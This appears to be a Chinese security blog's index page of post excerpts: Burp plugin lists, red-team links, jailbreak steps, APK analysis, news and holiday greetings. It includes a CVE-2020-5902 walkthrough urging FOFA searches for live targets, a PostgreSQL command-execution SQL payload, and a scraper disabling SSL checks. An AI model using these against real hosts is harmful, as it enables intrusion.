-
请武装您的BURP
+--- books | +--- Burp Suite使用 _ Pa55w0rd 's Blog.pdf | +--- Burp Suite使用中的一些技巧.pdf | +--- burp 日志插件「burplogger++.jar」从原理到实践-信安之路.pdf | +--- BurpSuite 代理设置的小技巧.pdf | +--- burpsuite实战指南.pdf | +--- Configuring Burp Suite with Android Nougat.pdf | +--- IOS之Burpsuite抓Https问题.pdf | +--- nmap-man-page.pdf | +--- Nmap渗透测试思维导图.png | +--- readme.md | +--- 利用Burpsuite爆破Tomcat密码.pdf | +--- 利用burp插件Hackvertor绕过waf并破解XOR加密 - 嘶吼 RoarTalk.pdf | +--- 基于BurpSuite快速探测越权-Authz插件.pdf | +--- 如何在64位Windows 10下安装java开发环境.pdf | +--- 新手福利 _ Burpsuite你可能不知道的技巧.pdf | +--- 本地文件包含漏洞检测工具 – Burp国产插件LFI scanner checks.pdf | +--- 配置Frida+BurpSuite+Genymotion, 绕过Android SSL Pinning-Configuring Frida with BurpSuite and Genymotion to bypass SSL Pinning.pdf +--- BurpSuiteCn.jar +--- Burp_start.bat +--- Burp_start_en.bat +--- cn.txt +--- Create-Desktop-Link.bat +--- GitZip-for-github_v0.3.1.crx +--- img | +--- ANSI.png | +--- crack1.png | +--- crack2.png | +--- crack3.png | +--- crack4.png | +--- crack5.png | +--- crack_ok.png | +--- CRLF_ANSI.png | +--- desktop_shortlink.png | +--- Goescat-Macaron-Burp-suite.ico | +--- hackbar.gif | +--- issues-example.png | +--- issues-example2.png | +--- passive-scan-client-0.1-jar-with-dependencies.gif | +--- ShellPass.png | +--- u2cTab.png | +--- 登上GitHub的trending截图纪念.png +--- Mrxn's Blog.url +--- plugins | +--- awesome-burp-extensions | | +--- README.md | +--- burp-vulners-scanner-1.2.jar | +--- burp-requests.jar | +--- bypasswaf.jar | +--- chunked-coding-converter.0.2.1.jar | +--- domain_hunter-v1.4.jar | +--- HackBar.jar | +--- http-request-smuggler-all.jar | +--- httpsmuggler.jar | +--- J2EEScan-2.0.0-beta-jar-with-dependencies.jar | +--- jsEncrypter.0.3 | | +--- jsEncrypter-0.3.jar | | +--- jsEncrypter_readme.pdf | | +--- nodejs_server.js | | +--- phantomjs_server.js | | +--- README.md | | +--- 对登录中账号密码进行加密之后再传输的爆破的思路和方式 - FreeBuf互联网安全新媒体平台.pdf | | +--- 编写加密传输爆破插件jsEncrypter _ 回忆飘如雪.pdf | +--- knife-v1.7.jar | +--- LFI scanner checks.jar | +--- LoggerPlusPlus.jar | +--- passive-scan-client-0.1-jar-with-dependencies.jar | +--- Readme.md | +--- reCAPTCHA-v0.9.jar | +--- sqlmap.jar | +--- sqlmap4burp++.0.2.jar | +--- WooyunSearch-1.0-SNAPSHOT-jar-with-dependencies.jar | +--- shiroPoc-0.5-SNAPSHOT-jar-with-dependencies.jar +--- README.md +--- 创建桌面快捷方式.bat +--- 创建桌面快捷方式.zip +--- 常见shell大小马密码.md +--- 渗透测试面试问题2019版.md 一些BURP的插件合集 https://github.com/Mr-xn/BurpSuite-collections ...
-
这个知识有点冷:为什么交通银行商标用繁体字
有没有人注意过,为什么“交通银行”标志那四个字是繁体字呢?按照商标法规定,只有建国前就成立的老字号才允许用繁体字,新企业必须用简体字。 今天要讲的故事就是海峡两岸的两个交通银行。为了叙述方便,我们管咱这边的叫上海交通银行,管海峡那边的叫台湾交通银行——俩省部级单位,很对等。 台湾交通银行是民国四大银行之一,跟着蒋公一起逃到台湾了。新中国成立以后,人民银行收编了所有的银行,央行商行一肩挑,一直到改革开放才开始重新设立商业银行。90年那会,工农中建四大行已经有了,为了走出一条新路,在上海成立了新中国第一家股份制银行。 新银行也想有个历史悠久的老招牌嘛。民国之前是票号,没法用。查了查民国时期四大行:中央银行、中国银行、中国农民银行和交通银行。央行不敢叫,中国银行还在,农民银行和农业银行冲突,于是就直接叫交通银行,而且是恢复组建。当然这事没和海峡对面的台湾交通银行商量。 上海交通银行开始做国际业务以后,洋人们崩溃了,怎么两个一模一样的交通银行呀,名字、英文简称、标志全一样!很多国际汇款直接寄错了地方。台湾交通银行很气愤,我从1908年经营到现在,怎么突然又冒出另一家跟我一样的。申请国际仲裁! 万万没想到,洋人认死理啊!人家不看你是不是一直营业,只看你有没有成立时候的文件资料。台湾交通银行傻眼了,蒋公南逃的时候只顾带金子,没带档案!上海交通银行很开心,悠哉悠哉地来到南京市第一档案馆,原国民政府中央档案馆,拿出了交通银行成立时的全套资料,你看,我们是恢复组建的正宗交通银行呀。 台湾交通银行彻底崩溃了,羞愧地改了名字,业务一蹶不振,没过几年就和其它银行合并了事。上海交通银行则是一路高歌猛进,并且在2008年庆祝了“百年交行”,稳居我国第五大银行。 看见没,档案比黄金更重要! ...
-
值得珍藏|红队资源
现如今,网络安全是近几年非常火热的一个行业,对于打算从事或入门网络安全不久的朋友来说,一直处于求学无门、无从下手的状态。为此小编将贝塔安全实验室成员分享的一些靶场环境、红队资源等个大家进行了总结,希望大家能好好利用,快速提升自己的技术水平! 01 红队资源 1.红队资料集锦:https://www.lshack.cn/772/2.AD攻击防御:https://github.com/infosecn1nja/AD-Attack-Defense3.优秀红队资源:https://github.com/yeyintminthuhtut/Awesome-Red-Teaming4.零租资料库:https://wiki.0-sec.org/#/md5.Micro8高级攻防:https://github.com/Micropoor/Micro86.红队常用命令:https://github.com/foobarto/redteam-notebook 7.APT笔记:https://github.com/kbandla/APTnotes8.渗透测试笔记:https://github.com/Techlord-RCE/Penetration-Testing9.web渗透笔记:https://github.com/qazbnm456/awesome-web-security 01 蓝队资源 1.蓝队资源集锦:https://github.com/fabacab/awesome-cybersecurity-blueteam2.攻防思维导图:https://github.com/SecWiki/sec-chart3.AWS安全检测:https://github.com/stuhirst/awssecurity/blob/master/arsenal.md4.AWS安全工具:https://github.com/toniblyx/my-arsenal-of-aws-security-tools5.GitHub监控工具:https://github.com/0xbug/Hawkeye6. github信息监测:https://github.com/Hell0W0rld0/Github-Hunter7.服务器安全管理平台:https://github.com/chaitin/cloudwalker8.评估工具:https://github.com/guardicore/monkey9.企业安全管理平台:https://github.com/zhaoweiho/SecurityManageFramwork 01 开源漏洞库 1.乌云漏洞详情文章:https://wooyun.kieran.top2.同程安全公开漏洞:https://sec.ly.com/bugs 3.中国国家工控漏洞库:http://ics.cnvd.org.cn 4.美国国家工控漏洞库:https://ics-cert.us-cert.gov/advisories 5.绿盟漏洞库:http://www.nsfocus.net/index.php?act=sec_bug 6.威努特工控漏洞库:http://ivd.winicssec.com/ 7.CVE中文工控漏洞库:http://cve.scap.org.cn/view/ics 8.美国Offensive Security的漏洞库:https://www.exploit-db.com 9.美国国家信息安全漏洞库:https://nvd.nist.gov/vuln/search 01 练习靶场 1.124个Hacking技术的网站:https://www.blackmoreops.com/2018/11/06/124-legal-hacking-websites-to-practice-and-learn/2.vulnhub: https://www.vulnhub.com3.世界知名ctf交流网站: https://www.wechall.net4.谷歌XSS挑战:https://www.xssgame.com5.在线靶场挑战:https://www.hackthebox.eu6.vulstudy:https://github.com/c0ny1/vulstudy7.多种漏洞复现系统:https://github.com/bkimminich/juice-shop8.sql注入:https://github.com/Audi-1/sqli-labs9.红日靶场:http://vulnstack.qiyuanxuetang.net/vuln/ ...
-
突发:宝塔公司全体员工疑似被警察带走
宝塔Linux面板是提升运维效率的服务器管理软件,支持一键LAMP/LNMP/集群/监控/网站/FTP/数据库/JAVA等100多项服务器管理功能。公司有30个人的专业团队研发及维护,经过200多个版本的迭代,功能全,少出错且足够安全,已获得全球百万用户认可安装。 今天在直播间,大家突然听到疑似警察的声音:“双手抱头,蹲下!” 然后各种方式无法和宝塔公司取得联系,截至发稿时间,没有任何消息,各个IT运维群已经炸锅。后续情况未名。 ...
-
对“犯罪天堂”的telegram电报软件的一次突破
不要认为在telegram上搞坏事,卖数据就没人能抓住你,下面就是案例。 摒弃传统的网络通讯工具和收款方式,使用境外聊天软件以及虚拟币的收款方式……近日,苏州园区警方远赴湖南、广东两省,成功捣毁一条泄露、贩卖公民个人信息的黑色产业链,抓获犯罪嫌疑人6名,现场查获作案用手机11部、电脑5台、手机卡物联卡20张,查获非法获取的各类公民个人信息数百万条。 今年3月中旬,园区公安分局网安大队深入开展“净网2020”专项行动,在网络巡查中获取了一条网民出售公民个人信息的线索,该网民在一个跨境即时通讯软件内发布出售会计报考、卫生类报考、大学生、业主等数据以及寻找黑客的广告。民警核查该线索后有进一步发现,贩卖的公民个人信息包含大量苏州地区会计考试报名、医师护士考试报名、在校学生等数据,且收款方式以虚拟币为主。 由于当时正值疫情高发敏感时期,被侵害对象包括医师护士等抗疫一线人员及在校学生等重点保护群体,犯罪嫌疑人摒弃传统的网络通讯工具和收款方式,使用境外聊天软件以及虚拟币的收款方式,犯罪手段新颖,社会危害后果严重。为维护疫情期间社会稳定,打击侵犯抗疫一线人员侵公犯罪的嚣张气焰,园区分局立即抽调网警大队、胜浦派出所、斜塘派出所等部门精干警力组成专案组,并积极寻求网警支队支撑,展开侦查工作。 经过缜密侦查,专案民警网上侦查收集、网下蹲点核实,突出了位于广东省东莞市的犯罪嫌疑人李某。连续工作多日后,专案民警顺藤摸瓜掌握了李某等人涉嫌犯罪相关情况,查明了分别位于湖南省衡阳市和广东省东莞市的两个出售公民个人信息的团伙及窝点,共涉及六名犯罪嫌疑人。4月22日,专案民警分别赶赴湖南省衡阳市和广东省东莞市同时开展收网行动,一举将李某等六人抓获。 经查,该团伙平均年龄不到26岁,成员组织严密、分工明确,具备较强反侦查意识。其中,有2人负责通过黑客手段非法获取公民个人信息数据,3人负责通过通讯软件销售非法公民个人信息数据,还有1人提供资金和账户支持。经初步筛查,在警方查获的数百万条公民个人信息中涉及苏州地区数据就有近十万条,包含医师、护士、会计职称、注册会计师、经济师、建筑师、车主等方方面面。 本案成功侦破,是对号称“犯罪天堂”的telegram电报软件的一次突破,保障了抗疫一线医护人员的合法权益,避免了国家考试网站遭受攻击,阻止了大量公民信息流入诈骗犯罪分子手中用于电信诈骗;同时为涉及境外软件、虚拟币的违法犯罪侦破工作拓宽思路,积累经验。该案也得到了公安部的肯定与认可,2020年6月被公安部列为部督案件。 在干这类的别着急,干坏事的,早晚给你们全抓住!怕了吗?...
-
酷我音乐真实地址解析
总结上次酷狗的经验我没有去百度直接去抓协议 打开我们的网页酷我随便播放一个音 f12仔细看一下MP3在哪里 找到了酷我的音乐地址 使用rid替换即可 返回值是jso api: http://www.kuwo.cn/url?format=mp3&rid=77810434&response=url&type=convert_url3&br=128kmp3&from=web&t=1569587300382&reqId=4a567af1-e122-11e9-bade-01a02613b222 ...
-
微博热点监控源码,可入库做数据分析。
<?php class Curl { //微博热点监控 public function Get_url_wb($url, $header) { $wburl = "https://s.weibo.com/weibo?q="; // 1. 初始化 curl $ch = curl_init(); // 设置URL和相应的选项 curl_setopt($ch, CURLOPT_URL, $url);//设置目标url curl_setopt($ch, CURLOPT_HEADER, false); //设置header curl_setopt($ch, CURLOPT_HTTPHEADER, $header); curl_setopt($ch, CURLOPT_HEADER, 0);//返回response头部信息 //要求结果为字符串且输出到屏幕上 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //规避SSL验证 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); //跳过HOST验证 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); //运行curl $data = curl_exec($ch); curl_close($ch); preg_match_all('/top" target="_blank">(.*?)<\/a>/U', $data, $Hot_search);//热搜名 preg_match_all('/<span>(.*?)<\/span>/U', $data, $Hotspot);//热度 preg_match_all('/href="\/weibo\?q=(.*?)Refer=top/U', $data, $Hoturl);//热度url for ($i = 0; $i < count($Hoturl[1]); $i++) { $Hoturl[1][$i] = $wburl . $Hoturl[1][$i]; } $arr = ["Hot_search" => $Hot_search[1], "Hotspot" => $Hotspot[1], "Hoturl" => $Hoturl[1]]; return json_encode($arr, 448); } } $a = new Curl(); $header = array(); echo $a->Get_url_wb("https://s.weibo.com/top/summary", $header); ...
-
JAVA常见异常类型整理
算数异常类:ArithmeticExecption 空指针异常类型:NullPointerException 类型强制转换类型:ClassCastException 数组负下标异常:NegativeArrayException 数组下标越界异常:ArrayIndexOutOfBoundsException 违背安全原则异常:SecturityException 文件已结束异常:EOFException 文件未找到异常:FileNotFoundException 字符串转换为数字异常:NumberFormatException 操作数据库异常:SQLException 输入输出异常:IOException 方法未找到异常:NoSuchMethodException 下标越界异常:IndexOutOfBoundsExecption 系统异常:SystemException 创建一个大小为负数的数组错误异常:NegativeArraySizeException 数据格式异常:NumberFormatException 安全异常:SecurityException 不支持的操作异常:UnsupportedOperationException ...
-
fugu基于checkm8漏洞的开源越狱
支持的设备 当前版本的Fugu仅支持iPad Pro(2017)和iPhone 7(iOS 13-13.3.1)。 项目获取 git clone https://github.com/LinusHenze/Fugu.git 建造 注意:广大研究人员也可以直接从本项目的【Release页面】下载Fugu的预编译版本。 在构建Fugu之前,请确保已安装好了Xcode以及Homebrew。 然后使用Homebrew来安装llvm和binutils: brew install llvm binutils 接下来,在Xcode中打开Fugu项目,选择Fugu作为目标并进行项目构建。构建完成后,Xcode将在构建目录中生成Fugu项目以及一个Shellcode目录,然后我们就可以开始使用Fugu了。 工具使用 我建议大家以无参数的形式运行Fugu,并查看所有的可用选项。 如果你想要对你的苹果设备进行越狱操作,可以直接运行下列命令: Fugu iStrap 你可能需要多次运行该命令才可以成功启用Fugu,如果你尝试了四、五次都没成功的话,请调整设备进入DFU模式后再进行尝试。 该命令将会向你的苹果设备发送一个内核启动引导程序以及iDownload(一款能够用来向苹果设备发送文件或执行命令的程序)。 安装Sileo、SSH和MobileSubstrate 注意:越狱有风险,操作需谨慎,请备份好所有文件后再进行操作,如操作对设备造成的损坏,请用户自行承担。 确保你的设备上已经安装好了libusbmuxd,如果没有安装,你可以通过Homebrew并使用下列命令来安装libusbmuxd: brew install libusbmuxd 安装好usbmuxd之后,启动你的苹果设备并进入越狱模式。同时,确保你的设备已通过USB连接到了你的macOS设备上。 接下来,使用下列命令安装Sileo: python install_sileo.py 运行该脚本之后,将会下载所有安装Sileo所需的组件并完成Sileo的安装。安装完成之后,你将会在应用程序栏中看到Sileo的图标。此时,SSH将会在后台运行,请确保已经修改了root/mobile密码。 组件Fugu由下列组件构成: 1、Fugu:macOS应用程序,可以通过checkm8漏洞来利用你苹果设备中的安全缺陷,并上传iStrap、iStrap加载器以及iDownload。 2、iStrap加载器:一段Shellcode代码,iBoot后会修复iBoot并加载iStrap。 3、iStrap:内核启动引导程序,会在苹果设备启动时显示,它会修复内核,注入启动参数并向内核注入Shellcode。 4、iDownload:运行在苹果设备上的程序,会在启动引导过程中完成安装。程序会监听端口1337,并且会给用户提供一个类似Bash的接口。 ...
-
干货|漏洞利用、实战练习平台、CTF比赛资源库
一、漏洞利用、实战练习平台 1、WebGoat漏洞练习环境 https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat-Legacy https://github.com/RandomStorm/DVWA 2、DoraBox,多拉盒 - 掌握常见漏洞攻防 https://github.com/gh0stkey/DoraBox 3、一个功能很全的CTF平台 https://github.com/zjlywjh001/PhrackCTF-Platform-Team 4、针对Pentest或者CTF的一个fuzz payload项目。 https://github.com/zer0yu/Berserker 5、Web安全实战:日安全-Web安全攻防小组关于Web安全的系列文章分享和HTB靶场 https://github.com/hongriSec/Web-Security-Attack 6、upload-labs很全的上传上传漏洞的靶场 https://github.com/c0ny1/upload-labs 7、跟踪真实漏洞相关靶场环境搭建 https://github.com/yaofeifly/Vub_ENV 8、数据库注入练习平台 https://github.com/Audi-1/sqli-labs 9、用node编写的漏洞练习平台,like OWASP Node Goat https://github.com/cr0hn/vulnerable-node 10、基于https://www.exploit-db.com/的漏洞场景还原 https://github.com/havysec/vulnerable-scene 11、Ruby编写的一款工具,生成含漏洞的虚拟机 https://github.com/cliffe/secgen 12、metasploitable3 https://github.com/rapid7/metasploitable3/ 13、pentesterlab渗透测试在线练习 https://pentesterlab.com/exercises/ 14、轻量web漏洞演示平台 https://github.com/stamparm/DSVW 15、docker搭建的漏洞练习环境 https://github.com/MyKings/docker-vulnerability-environment 16、黑客技术训练环境 https://github.com/joe-shenouda/awesome-cyber-skills 17、web及app渗透训练平台 https://github.com/OWASP/SecurityShepherd 18、DevSecOps技能训练营 https://github.com/devsecops/bootcamp 19、injectify 生成一个便捷的高级中间人攻击Web站点 https://github.com/samdenty99/injectify 20、针对ctf线下赛流量抓取(php)、真实环境流量抓取分析的工具 https://github.com/wupco/weblogger 21、permeate:一个用于渗透透测试演练的WEB系统,用于提升寻找网站能力,也可以用于web安全教学 https://github.com/78778443/permeate 二、安全竞赛 (CTF夺标大赛) 1、Google2019CTF web 解题思路 https://xz.aliyun.com/t/5503 2、2018 第一届安洵杯 题目环境/源码 https://github.com/D0g3-Lab/AXB-CTF 3、google-ctf 包括2017和2018全部试题和答案 https://github.com/google/google-ctf/ 4、HCTF2017题目及解析 https://github.com/vidar-team/HCTF2017 5、CTF挑战平台 https://github.com/CTFTraining 6、灰帽子资源集,包括CTF、密码学、Linux攻击、USB攻击、漏洞等 https://github.com/bt3gl/Gray-Hacker-Resources 7、CTF和安全工具大合集 https://github.com/zardus/ctf-tools 8、近年CTF writeup大全 https://github.com/ctfs/write-ups-2016 9、HITB CTF 2017 Pwn题研究 http://0x48.pw/2017/08/29/0x49 10、脸谱CTF竞赛平台Demo https://github.com/facebook/fbctf 11、CTF框架、类库、资源、软件和教程列表 https://github.com/apsdehal/awesome-ctf 12、CTF的题集 https://github.com/Hcamael/CTF_repo 13、CTF资源 https://github.com/ctfs/resources 14、CTF从入门到了解各种工具 https://github.com/SandySekharan/CTF-tool 15、p4团队的CTF解决方案 https://p4.team https://github.com/p4-team/ctf 16、ctftools 在线CTF信息网站,包括资源下载、在线工具、信息blog等 https://www.ctftools.com https://github.com/bollwarm/SecToolSet/blob/master/All.md ...
-
CVE-2020-5902 简单利用
漏洞简述 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。此漏洞允许未经身份验证的攻击者或经过身份验证的用户通过BIG-IP管理端口和/或自身IP对TMUI进行网络访问,以执行任意系统命令、创建或删除文件、禁用服务和/或执行任意Java代码。 受影响的版本 F5 BIG-IP 15.x 已知易受攻击版本 15.1.0、15.0.0F5 BIG-IP 14.x 已知易受攻击版本 14.1.0-14.1.2F5 BIG-IP 13.x 已知易受攻击版本 13.1.0-13.1.3F5 BIG-IP 12.x 已知易受攻击版本 12.1.0-12.1.5F5 BIG-IP 11.x 已知易受攻击版本 11.6.1-11.6.5 漏洞复现下载poc https://github.com/zhzyker/CVE-2020-5902 查找具备漏洞版本的目标,这里利用FOFA搜索的 title="BIG-IP" 关键信息 运行命令 python3 cve-2020-5902_file.py IP 利用成功,可以返回当前用户信息 注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。 ...
-
一份礼物.apk的逆向分析
事情起因是震惊全国大学生的1013事件!!! 刚好看到社团群里在讨论这个,于是就发挥专业特长分析一下 拿到apk ,第一步肯定先放到虚拟机里跑一下看下效果emmm这似曾相识的页面,这熟悉的音量,唯一变化的就是音乐变成了O泡果奶的魔性洗脑广告。懂了,这不就是 "送给最好的ta.apk" 吗? 使用Android killer或apk改之理分析一下,这里使用Android Killer: 通过对比送给最好的ta.apk发现: 多了一个layout.lua文件,不过从名字上看这就是个布局文件,影响不大,再就是mp3文件名字从原来的0.mp3改为了mc.mp3,其他的都没变,甚至软件图标都没变。这个mc.mp3就是播放的广告音频了。 剩下的就简单了,虽然lua文件是加密过的,通过分析java代码,发现加密方式也没变,依旧使用/lib/armeabli-v7a/libluajava.so加密,因此使用ida7.0(x32)对这个文件逆向分析: 查找到在luaL.loadbufferx里面有对文件解密的过程 这里直接拿pcat大佬写的解密脚本: from ctypes import *import sys def decrypt(filename): s = open(filename, 'rb').read() outfile = 'out.lua' if s[0] == chr(0x1b) and s[1] != chr(0x4c): rst = chr(0x1b) size = len(s) v10 = 0 for i in range(1, size): v10 += size v = (c_ulonglong(-2139062143 * v10).value >> 32) + v10 v1 = c_uint(v).value >> 7 v2 = c_int(v).value < 0 rst += chr(ord(s[i]) ^ (v10 + v1 + v2) & 0xff) with open(outfile, 'wb') as f: f.write(rst) else: pass def foo(): print len(sys.argv) if len(sys.argv) == 2: filename = sys.argv[1] else: filename = 'main.lua' decrypt(filename) if __name__ == '__main__': foo() 将得到的文件使用unluac.jar进行还原,最终得到三个lua文件分别为: init.lua: local L0, L1appname = "\230\143\146\228\187\1829.0"appver = "9.0"packagename = "com.ta.cnm"appcode = "9"appsdk = "15"theme = "Theme_DeviceDefault_Light_NoActionBar"L0 = {}L1 = "WRITE_EXTERNAL_STORAGE"L0[1] = L1user_permission = L0 main.lua: local L0, L1, L2, L3L0 = requireL1 = "import"L0(L1)L0 = importL1 = "android.app.*"L0(L1)L0 = importL1 = "android.os.*"L0(L1)L0 = importL1 = "android.widget.*"L0(L1)L0 = importL1 = "android.view.*"L0(L1)L0 = importL1 = "android.view.View"L0(L1)L0 = importL1 = "android.content.Context"L0(L1)L0 = importL1 = "android.media.MediaPlayer"L0(L1)L0 = importL1 = "android.media.AudioManager"L0(L1)L0 = importL1 = "com.androlua.Ticker"L0(L1)L0 = activityL0 = L0.getSystemServiceL1 = ContextL1 = L1.AUDIO_SERVICEL0 = L0(L1)L0 = L0.setStreamVolumeL1 = AudioManagerL1 = L1.STREAM_MUSICL2 = 15L3 = AudioManagerL3 = L3.FLAG_SHOW_UIL0(L1, L2, L3)L0 = activityL0 = L0.getDecorViewL0 = L0()L0 = L0.setSystemUiVisibilityL1 = ViewL1 = L1.SYSTEM_UI_FLAG_HIDE_NAVIGATIONL2 = ViewL2 = L2.SYSTEM_UI_FLAG_IMMERSIVEL1 = L1 | L2L0(L1)L0 = MediaPlayerL0 = L0()m = L0L0 = mL0 = L0.resetL0()L0 = mL0 = L0.setDataSourceL1 = activityL1 = L1.getLuaDirL1 = L1()L2 = "/mc.mp3"L1 = L1 .. L2L0(L1)L0 = mL0 = L0.prepareL0()L0 = mL0 = L0.startL0()L0 = mL0 = L0.setLoopingL1 = trueL0(L1)L0 = TickerL0 = L0()ti = L0L0 = tiL0.Period = 10L0 = tifunction L1() local L0, L1, L2, L3 L0 = activity L0 = L0.getSystemService L1 = Context L1 = L1.AUDIO_SERVICE L0 = L0(L1) L0 = L0.setStreamVolume L1 = AudioManager L1 = L1.STREAM_MUSIC L2 = 15 L3 = AudioManager L3 = L3.FLAG_SHOW_UI L0(L1, L2, L3) L0 = activity L0 = L0.getDecorView L0 = L0() L0 = L0.setSystemUiVisibility L1 = View L1 = L1.SYSTEM_UI_FLAG_HIDE_NAVIGATION L2 = View L2 = L2.SYSTEM_UI_FLAG_IMMERSIVE L1 = L1 | L2 L0(L1)endL0.onTick = L1L0 = tiL0 = L0.startL0()function L0(A0, A1) local L2, L3, L4, L5 L2 = string L2 = L2.find L3 = tostring L4 = A1 L3 = L3(L4) L4 = "KEYCODE_BACK" L2 = L2(L3, L4) if L2 ~= nil then L2 = activity L2 = L2.getSystemService L3 = Context L3 = L3.AUDIO_SERVICE L2 = L2(L3) L2 = L2.setStreamVolume L3 = AudioManager L3 = L3.STREAM_MUSIC L4 = 15 L5 = AudioManager L5 = L5.FLAG_SHOW_UI L2(L3, L4, L5) end L2 = true return L2endonKeyDown = L0 layout.lua: local L0, L1, L2, L3L0 = {}L1 = LinearLayoutL0.layout_width = "fill"L0.layout_height = "fill"L2 = {}L3 = ButtonL2.textColor = "#D50000"L2.text = "\230\131\138\228\184\141\230\131\138\229\150\156 \230\132\143\228\184\141\230\132\143\229\164\150"L2.layout_height = "match_parent"L2.layout_width = "match_parent"L2.background = "#88888888"L2[1] = L3L0[1] = L1L0[2] = L2return L0 分析这三个文件: init.lua: 定义了app的名字,版本(已经是9.0了吗),包名(有点暴躁啊这位老哥),sdk版本,使用的主题,需要的权限等数据 main.lua: 具体逻辑都在这里面,大概就是读取mc.mp3 播放 并一直把音量调整到15(最大),监听禁用返回按钮。 layout.lua: 设置页面布局 恶搞一时爽,但是也要有度。 万一下一次是个带病毒的文件呢? 对了 解决方案-----------关掉进程或关机! ...
-
安卓手机时间突然变慢10多分钟:原因不详
10月12日晚间,众多网友突然发现,自己的安卓手机显示的时间,与北京时间相比慢了10多分钟,绝大部分都在16-17分钟左右。 由于事发突然而且诡异,几乎所有人都是懵圈状态,以为是自己的手机出了问题,或者穿越了。 汇总目前的情况看,这次事件变慢问题仅限安卓手机,而且似乎和品牌、地域无关,即便关机重启也不行,iPhone则并无问题。 有网友称,地铁刷卡处堵了一大批人,都是手机时间不对,无法扫码,乘务员也说是时间问题。 还有的网友表示,差点给自己爸爸换了个手机。 目前尚不清楚为何会出现这种情况,有人支招说开关一下飞行模式即可,还有的发现关闭自动设置时间即可。有遭遇的网友不妨一试。 ...
-
PostgreSQL 高权限命令执行漏洞
PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 默认账号密码为postgres/postgres。 首先连接到postgres中,并执行参考链接中的POC: <font face="宋体" size="4">DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;</font> FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中 大概就这些…… ...
-
外交部:中国遭受境外网络攻击持续增加
中国国家互联网应急中心日前发布的2020年上半年中国互联网网络安全监测数据分析报告显示,中国遭受来自境外的网络攻击持续增加,美国是针对中国网络攻击的最大来源国。对此,中国外交部发言人汪文斌29日表示,中方更有理由对此前美国媒体关于美国大力推行网络空间“持续交手”战略,降低授权门槛肆意对他国关键信息基础设施发动攻击的报道表示担忧。 汪文斌在当天举行的外交部例行记者会上表示,中方已注意到这份报告,报告内容反映了中国在网络安全领域面临的一些突出挑战。首先中国仍是网络攻击的主要受害者之一,在疫情期间遭受的网络攻击有增无减。其次,美国是针对中国网络攻击的最大来源国。从境外计算机恶意程序捕获次数、向境外恶意程序控制服务器数量、境外拒绝服务攻击(DDoS)次数、向中国境内网站植入后门等多项指标看,美国均高居首位。 他表示,第三,针对中国关键信息基础设施的网络侦察值得关注。报告显示,中国工业控制系统的网络资产持续遭受来自境外的扫描嗅探,日均超过2万次,目标涉及境内能源、制造、通信等重点行业的联网工业控制设备和系统。与其他类型网络攻击相比,上述网络侦察行动更可能具有较强的政府背景。 “我想强调的是,网络攻击是各国面临的共同挑战,中国一贯主张各国在相互尊重、平等互利的基础上加强对话合作,共同应对这一挑战。我们也呼吁各国在网络空间采取负责任的行为。同时,中国将采取必要措施,增进自身网络安全,特别是保护关键信息基础设施免受威胁和破坏。”汪文斌称。 ...
-
喜迎中秋的精致文案,祝您阖家团圆,节日快乐!
一、中秋到,祝福到,一祝心情好,二祝没烦恼,三祝步步高,四祝财源广,五祝容颜俏,六祝所有快乐统统将你围绕!中秋快乐! 二、今夜明月圆,家家人团圆,幸福好因缘,快乐朋友缘,甜蜜爱情缘,愿你日日花好月圆,中秋更是幸福团圆! 三、月亮圆,月饼圆,团团圆圆人团圆;家人圆,幸福圆,快快乐乐合家园;爱情圆,事业圆,顺顺利利好梦圆;今日圆,明日圆,岁岁年年总团圆。祝中秋快乐,事事圆圆满满! 四、月儿圆圆东海边,抛洒银光满人间。世人举头尽望月,品尝月饼乐欢颜。我心依旧不曾变,挂怀好友在心前。值此佳节送祝福,愿你中秋乐数冠。 五、国庆中秋节,赏明月,广寒宫,美嫦娥,下人间,送和谐,合家欢,团圆夜,拜长辈,亲朋乐,尝佳肴,品琼液,最皎洁,故乡月。 六、天苍苍,野茫茫,工作晕头转向忙;日奔波,夜奔波,升官机会轮不上;楼价涨,菜价涨,涨薪希望太渺茫;中秋到,假期来,不如相约抢银行;今晚我去找你,记住咱的接头暗号:中秋将至,提钱快乐! 七、携月桂一缕香,愿你乐享快乐芬芳;采月华一片霜,愿你荣获好运之光;借月饼一粒糖,愿你将甜蜜品尝。中秋到了,祈月送福,真心朋友情谊长,衷心祝你及你的家人花好月圆人安康,春华秋实家富贵! 八、中秋到,手机叫,祝福连绵真热闹,月亮照,好运到,吉祥如意把你绕,嫦娥俏,玉兔跳,为你挥杵捣仙药,月老笑,红线绕,为你尽把良缘挑!中秋乐淘淘! 九、花好月圆日,中秋喜相逢;明月寓团圆,祝福寄友朋:愿生活如圆月,梦想皆达成,幸福明月光,伴你天下行!中秋快乐! 十、中秋时节雨纷纷,思念客户已断魂。若无风雨阻去路,必定上门来祝福。无奈天公不作美,祝福化作短信来。祝您节日多快乐,愿您日日喜丰收! 十一、中秋月儿分外明,照得祖国一家亲。合家相聚祝团圆,国泰民安庆国庆。中秋国庆双合璧,喜气洋洋过双节。双重祝福送给你,祝你好事连连到,幸福无极限 十二、大雁南飞秋夜辞,千里拍云赠一诗。仙子识丹恨天去,悔误人间月圆时。中秋到了,愿你月圆人圆花好,事顺业顺家兴。 十三、沧海月明,思念越千山;烟波万重,祝福遥相送。为了生活,披一身风霜,你奔波异乡;追逐梦想,藏一怀衷肠,你步履匆忙。不同的地方,一样的月亮,中秋佳节,不论你身处何方,都愿花好月圆人安康。 十四、装一袋阳光两把海风,自制了几斤祝福,托人到美国买了些快乐,法国买了两瓶浪漫,从心灵的深处切下几许关怀,作为礼物送给你,祝中秋快乐! 十五、今年过节不收礼,其实给点也可以。十块八块不嫌弃,十万八万过得去。你要真是没得送,短信一条也可以。中秋快乐! 